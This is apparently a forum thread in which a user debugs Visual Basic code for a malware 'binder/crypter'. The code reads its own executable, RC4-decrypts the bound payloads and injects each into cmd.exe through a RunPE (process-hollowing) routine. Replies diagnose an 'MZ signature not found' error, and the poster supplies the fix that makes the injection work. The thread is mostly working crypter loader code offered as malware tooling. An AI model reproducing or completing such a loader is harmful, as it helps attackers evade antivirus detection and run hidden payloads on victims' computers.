Thread: MZ signature RunPE

Small problem with this code for a binder/crypter

Code:

Dim Stub As String, Files() As String, i As Integer, sDecr() As String

Open App.Path & "\" & "Bound" & ".exe" For Binary As #1 'open itself
Stub = Space(LOF(1))  'buffer var Stub
Get #1, , Stub 'load binary of Stub into var Stub
Close #1

Files = Split(Stub, Splitter) 'split stub into bound files, last split is the encryption key


For i = 1 To (UBound(Files()) - 1) 'the last item in Files() is key not exe, first (0) is stub, so ignore those...
RunExe "C:\WINDOWS\system32\cmd.exe", RC4(Files(i), Files(UBound(Files()))) 'decrypts the current exe [i] with the key [(ubound(files())].
Next i

I get "MZ signature not found!" error with RunPE. Any ideas?
Appreciated.

seems like u delete the MZ Dos Header when trying to use RunEXE

It looks like you try to Map a Non-PE-File into the Memory..

I'm pretty sure the header is present, for example

Code:

MZ       ÿÿ  ¸       @                                   È   º ´  Í!¸
LÍ!This program cannot be run in DOS mode.

is a typical output of the RC4 function in the code in my first post. Also if I write the output of the RC4 into a file (by binary), the file is a valid executable.

I think it might be to do with data types... can't figure it out though...
RC4 outputs a string, I think RunEXE expects an array but how to do that?

Sorry didn't log in,
anyway as I say I think it is due to data types... string vs byte/array
any ideas?

Found it!

The last line in the RC4 function is
RC4 = StrConv(ByteArray, vbUnicode)

This formatting throws off the RunEXE function,
RC4 = ByteArray does the trick.